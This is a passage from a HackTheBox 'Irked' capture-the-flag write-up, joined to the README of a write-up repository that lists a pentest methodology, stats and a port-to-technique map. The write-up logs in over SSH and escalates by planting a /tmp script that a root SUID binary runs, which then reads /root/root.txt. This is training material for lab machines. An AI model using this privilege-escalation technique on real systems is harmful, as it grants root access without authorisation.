Use this password to login into the `djmardov's` account via `SSH`
![alt text](images/ssh-in.png)
Now just find the **`user.txt`** in the `Documents` folder
```bash
djmardov@irked:~$ cat ./Documents/user.txt
4a66a78b12dc0e661a59d3f5c0267a8e
```
Priv escalation
--------------------------------------------------------------------
Now let's run `LinEnum` file to see if we can find something interesting.
I got something interesting in SUIDs
![alt text](images/suid.png)
The `viewuser` command looks interesting.Executing the viewuser command I got the following output:
![alt text](images/viewuser.png)
Notice the last line
```
sh: 1: /tmp/listusers: not found
```
So basically the `viewuser` command is showing all the users and then it's trying to execute the `listusers` file in the `/tmp` directory.
Let's go and make a file and see with what privileges it's executing that file(it should be `root` because the `viewuser` SUID is under root)
```bash
#!/bin/bash
whoami
```
Now execute the `viewuser` command again and BOOM!!! :tada:
![alt text](images/whoami.png)
This mean we can execute any command as a `root`, so simply put the following line in the file:
```bash
#!/bin/bash
cat /root/root.txt
```
![alt text](images/root.png)
|
# 📖 ReadMe
[![License: CC BY-SA 4.0](https://raw.githubusercontent.com/7h3rAm/7h3rAm.github.io/master/static/files/ccbysa4.svg)](https://creativecommons.org/licenses/by-sa/4.0/)
<a name="contents"></a>
## 🔖 Contents
- ☀️ [Methodology](#methodology)
* ⚙️ [Phase 0: Recon](#mrecon)
* ⚙️ [Phase 1: Enumerate](#menumerate)
* ⚙️ [Phase 2: Exploit](#mexploit)
* ⚙️ [Phase 3: PrivEsc](#mprivesc)
- ☀️ [Stats](#stats)
* 📊 [Counts](#counts)
* 📊 [Top Categories](#topcategories)
* 📊 [Top Ports/Protocols/Services](#topportsprotocolsservices)
* 📊 [Top TTPs](#topttps)
- ⚡ [Mapping](#mapping)
- 💥 [Machines](#machines)
- ☢️ [TTPs](#ttps)
* ⚙️ [Enumerate](#enumerate)
* ⚙️ [Exploit](#exploit)
* ⚙️ [PrivEsc](#privesc)
- ⚡ [Tips](#tips)
- 💥 [Tools](#tools)
- 🔥 [Loot](#loot)
* 🔑 [Credentials](#credentials)
* 🔑 [Hashes](#hashes)
<a name="methodology"></a>
## ☀️ Methodology [↟](#contents)
<a name="mrecon"></a>
### ⚙️ Phase #0: Recon [🡑](#methodology)
**Goal**: to scan all ports on <targetip>
**Process**:
* [enumerate_nmap_initial](#enumerate_nmap_initial)
* [enumerate_nmap_tcp](#enumerate_nmap_tcp)
* [enumerate_nmap_udp](#enumerate_nmap_udp)
<a name="menumerate"></a>
### ⚙️ Phase #1: Enumerate [🡑](#methodology)
**Goal**: to find service and version details
**Process**:
* find ttps for open ports
* start with weird services
* identify installed software and version
* find critical cve/exploits
* enumerate more common services - smb/ftp
* enumerate services with large attack vector like http at the end
<a name="mexploit"></a>
### ⚙️ Phase #2: Exploit [🡑](#methodology)
**Goal**: gain interactive access on <targetip>
**Process**:
* debug available exploits for open ports
<a name="mprivesc"></a>
### ⚙️ Phase #3: PrivEsc [🡑](#methodology)
**Goal**: gain elevated privileges on <targetip>
**Process**:
* debug available exploits or misconfigurations
* for nix, use [linux smart enum](https://github.com/diego-treitos/linux-smart-enumeration)
* for windows, use [winpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
<a name="stats"></a>
## ☀️ Stats [↟](#contents)
### 📊 Counts [🡑](#stats)
| # | TryHackMe | HackTheBox | VulnHub | OSCPlike | Owned |
|:--------:|:---------------:|:----------------:|:-----------------:|:-----------------:|:-----------------:|
| Total | `1/591 (0.17%)` | `25/303 (8.25%)` | `24/725 (3.31%)` | `46/254 (18.11%)` | `50/1619 (3.09%)` |
| Windows | `0/0 (0.00%)` | `12/82 (14.63%)` | `0/2 (0.00%)` | `12/39 (30.77%)` | `12/84 (14.29%)` |
| *nix | `0/0 (0.00%)` | `13/221 (5.88%)` | `24/723 (3.32%)` | `34/177 (19.21%)` | `37/944 (3.92%)` |
| OSCPlike | `0/38 (0.00%)` | `25/94 (26.60%)` | `21/122 (17.21%)` | | `46/254 (18.11%)` |
<a name="topcategories"></a>
### 📊 Top Categories [🡑](#stats)
<img src="./top_categories.png" height="320" />
<a name="topportsprotocolsservices"></a>
### 📊 Top Ports/Protocols/Services [🡑](#stats)
<img src="./top_ports.png" height="320" />
---
<img src="./top_protocols.png" height="320" />
---
<img src="./top_services.png" height="320" />
<a name="topttps"></a>
### 📊 Top TTPs [🡑](#stats)
<img src="./top_ttps_enumerate.png" height="320" />
---
<img src="./top_ttps_exploit.png" height="320" />
---
<img src="./top_ttps_privesc.png" height="320" />
<a name="mapping"></a>
## ⚡ Mapping [↟](#contents)
| # | Port | Service | TTPs | TTPs - ITW |
|---|------|-----------|------|------------|
| 1. | `21/tcp` | `ftp/Microsoft ftpd`<br /><br />`ftp/vsftpd 2.3.5` | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp) | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root) |
| 2. | `22/tcp` | `ssh/OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)`<br /><br />`ssh/OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)`<br /><br />`ssh/OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)`<br /><br />`ssh/OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)` | [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh) | [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_defaultcreds), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
| 3. | `23/tcp` | | [`enumerate_proto_telnet`](https://github.com/7h3rAm/writeups#enumerate_proto_telnet) | |
| 4. | `25/tcp` | | [`enumerate_proto_smtp`](https://github.com/7h3rAm/writeups#enumerate_proto_smtp) | |
| 5. | `53/tcp` | | [`enumerate_proto_dns`](https://github.com/7h3rAm/writeups#enumerate_proto_dns) | |
| 6. | `79/tcp` | | [`enumerate_proto_finger`](https://github.com/7h3rAm/writeups#enumerate_proto_finger) | |
| 7. | `80/tcp` | `http/2.4.18 ((Ubuntu))`<br /><br />`http/Apache httpd`<br /><br />`http/Apache httpd 2.0.52 ((CentOS))`<br /><br />`http/Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)`<br /><br />`http/Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)`<br /><br />`http/Apache httpd 2.2.22 ((Ubuntu))`<br /><br />`http/Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)`<br /><br />`http/Apache httpd 2.4.18 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.25 ((Debian))`<br /><br />`http/Apache httpd 2.4.29`<br /><br />`http/Apache httpd 2.4.29 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.34 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.41 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.7 ((Ubuntu))`<br /><br />`http/HttpFileServer httpd 2.3`<br /><br />`http/Microsoft IIS httpd 6.0`<br /><br />`http/Microsoft IIS httpd 7.5` | [`enumerate_app_apache`](https://github.com/7h3rAm/writeups#enumerate_app_apache), [`enumerate_app_apache_tomcat`](https://github.com/7h3rAm/writeups#enumerate_app_apache_tomcat), [`enumerate_app_coldfusion_files`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_files), [`enumerate_app_coldfusion_version`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_version), [`enumerate_app_drupal`](https://github.com/7h3rAm/writeups#enumerate_app_drupal), [`enumerate_app_joomla`](https://github.com/7h3rAm/writeups#enumerate_app_joomla), [`enumerate_app_phpmyadmin`](https://github.com/7h3rAm/writeups#enumerate_app_phpmyadmin), [`enumerate_app_prtg`](https://github.com/7h3rAm/writeups#enumerate_app_prtg), [`enumerate_app_webmin`](https://github.com/7h3rAm/writeups#enumerate_app_webmin), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_proto_webdav`](https://github.com/7h3rAm/writeups#enumerate_proto_webdav) | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_hfs_cmd_exec`](https://github.com/7h3rAm/writeups#exploit_hfs_cmd_exec), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`exploit_shellshock`](https://github.com/7h3rAm/writeups#exploit_shellshock), [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell), [`privesc_bof`](https://github.com/7h3rAm/writeups#privesc_bof), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046), [`privesc_windows_ms14_070`](https://github.com/7h3rAm/writeups#privesc_windows_ms14_070), [`privesc_windows_ms15_051`](https://github.com/7h3rAm/writeups#privesc_windows_ms15_051), [`privesc_windows_ms16_098`](https://github.com/7h3rAm/writeups#privesc_windows_ms16_098) |
| 8. | `111/tcp` | | [`enumerate_proto_nfs`](https://github.com/7h3rAm/writeups#enumerate_proto_nfs), [`enumerate_proto_rpc`](https://github.com/7h3rAm/writeups#enumerate_proto_rpc) | |
| 9. | `135/tcp` | | [`enumerate_proto_rpc`](https://github.com/7h3rAm/writeups#enumerate_proto_rpc) | |
| 10. | `139/tcp` | `netbios-ssn/Microsoft Windows netbios-ssn`<br /><br />`netbios-ssn/Samba smbd 3.X - 4.X (workgroup: WORKGROUP)` | [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067), [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010) | [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067), [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_usermap`](https://github.com/7h3rAm/writeups#exploit_smb_usermap), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root) |
| 11. | `161/tcp` | | [`enumerate_proto_snmp`](https://github.com/7h3rAm/writeups#enumerate_proto_snmp) | |
| 12. | `389/tcp` | | [`enumerate_proto_ldap`](https://github.com/7h3rAm/writeups#enumerate_proto_ldap) | |
| 13. | `443/tcp` | `ssl/https/Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b` | [`enumerate_app_apache`](https://github.com/7h3rAm/writeups#enumerate_app_apache), [`enumerate_app_apache_tomcat`](https://github.com/7h3rAm/writeups#enumerate_app_apache_tomcat), [`enumerate_app_coldfusion_files`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_files), [`enumerate_app_coldfusion_version`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_version), [`enumerate_app_drupal`](https://github.com/7h3rAm/writeups#enumerate_app_drupal), [`enumerate_app_joomla`](https://github.com/7h3rAm/writeups#enumerate_app_joomla), [`enumerate_app_phpmyadmin`](https://github.com/7h3rAm/writeups#enumerate_app_phpmyadmin), [`enumerate_app_prtg`](https://github.com/7h3rAm/writeups#enumerate_app_prtg), [`enumerate_app_webmin`](https://github.com/7h3rAm/writeups#enumerate_app_webmin), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_proto_webdav`](https://github.com/7h3rAm/writeups#enumerate_proto_webdav) | [`exploit_modssl`](https://github.com/7h3rAm/writeups#exploit_modssl), [`privesc_modssl`](https://github.com/7h3rAm/writeups#privesc_modssl) |
| 14. | `445/tcp` | `microsoft-ds/Windows Server 2019 Standard 17763 microsoft-ds` | [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067), [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010) | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) |
| 15. | `636/tcp` | | [`enumerate_proto_ldap`](https://github.com/7h3rAm/writeups#enumerate_proto_ldap) | |
| 16. | `1337/tcp` | `http/Apache httpd 2.4.7 ((Ubuntu))` | | [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) |
| 17. | `1433/tcp` | `ms-sql-s/Microsoft SQL Server 14.00.1000.00` | [`enumerate_proto_mssql`](https://github.com/7h3rAm/writeups#enumerate_proto_mssql), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig) | [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell) |
| 18. | `1521/tcp` | | [`enumerate_proto_oracle`](https://github.com/7h3rAm/writeups#enumerate_proto_oracle), [`enumerate_proto_postgres`](https://github.com/7h3rAm/writeups#enumerate_proto_postgres) | |
| 19. | `1974/tcp` | | | [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
| 20. | `2049/tcp` | `nfs_acl/2-3 (RPC #100227)`<br /><br />`nfs_acl/3 (RPC #100227)` | [`enumerate_proto_nfs`](https://github.com/7h3rAm/writeups#enumerate_proto_nfs) | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid) |
| 21. | `3000/tcp` | `http/Node.js Express framework` | | [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) |
| 22. | `3232/tcp` | | [`enumerate_proto_distcc`](https://github.com/7h3rAm/writeups#enumerate_proto_distcc) | |
| 23. | `3306/tcp` | | [`enumerate_proto_mysql`](https://github.com/7h3rAm/writeups#enumerate_proto_mysql) | |
| 24. | `6660/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | |
| 25. | `6661/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | |
| 26. | `6662/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | |
| 27. | `6663/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | |
| 28. | `6664/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | |
| 29. | `6665/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | |
| 30. | `6666/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | |
| 31. | `6667/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | |
| 32. | `6668/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | |
| 33. | `6669/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | |
| 34. | `7000/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | |
| 35. | `8080/tcp` | `http/Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)`<br /><br />`http/Apache httpd 2.4.29 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)` | [`enumerate_app_apache`](https://github.com/7h3rAm/writeups#enumerate_app_apache), [`enumerate_app_apache_tomcat`](https://github.com/7h3rAm/writeups#enumerate_app_apache_tomcat), [`enumerate_app_coldfusion_files`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_files), [`enumerate_app_coldfusion_version`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_version), [`enumerate_app_drupal`](https://github.com/7h3rAm/writeups#enumerate_app_drupal), [`enumerate_app_joomla`](https://github.com/7h3rAm/writeups#enumerate_app_joomla), [`enumerate_app_phpmyadmin`](https://github.com/7h3rAm/writeups#enumerate_app_phpmyadmin), [`enumerate_app_prtg`](https://github.com/7h3rAm/writeups#enumerate_app_prtg), [`enumerate_app_webmin`](https://github.com/7h3rAm/writeups#enumerate_app_webmin), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_proto_rdp`](https://github.com/7h3rAm/writeups#enumerate_proto_rdp), [`enumerate_proto_webdav`](https://github.com/7h3rAm/writeups#enumerate_proto_webdav) | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
| 36. | `9999/tcp` | `abyss?` | | [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) |
| 37. | `10000/tcp` | `http/SimpleHTTPServer 0.6 (Python 2.7.3)` | | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof) |
| 38. | `27017/tcp` | | [`enumerate_app_mongo`](https://github.com/7h3rAm/writeups#enumerate_app_mongo) | |
| 39. | `28017/tcp` | | [`enumerate_app_mongo`](https://github.com/7h3rAm/writeups#enumerate_app_mongo) | |
<a name="machines"></a>
## 💥 Machines [↟](#contents)
| # | Name | Infra | Killchain | TTPs |
|:---:|:--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:|:---------------------------------------------------------------------------:|:--------------------------------------------------------------------------------------------------------------------------------------:|:-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:|
| 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100"/> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) |
| 2. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/ratings.png" width="59" height="20"/> | [htb#118](https://app.hackthebox.eu/machines/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100"/> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) |
| 3. | [Billy Madison: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf) | [vh#161](https://www.vulnhub.com/entry/billy-madison-11,161/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png" width="100" height="100"/> | [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
| 4. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/ratings.png" width="59" height="20"/> | [htb#48](https://app.hackthebox.eu/machines/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100"/> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
| 5. | [Blue](https://github.com/7h3rAm/writeups/blob/master/htb.blue/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/ratings.png" width="59" height="20"/> | [htb#51](https://app.hackthebox.eu/machines/51) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/killchain.png" width="100" height="100"/> | [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010) |
| 6. | [Brainpan: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf) | [vh#51](https://www.vulnhub.com/entry/brainpan-1,51/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png" width="100" height="100"/> | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof), [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) |
| 7. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100"/> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
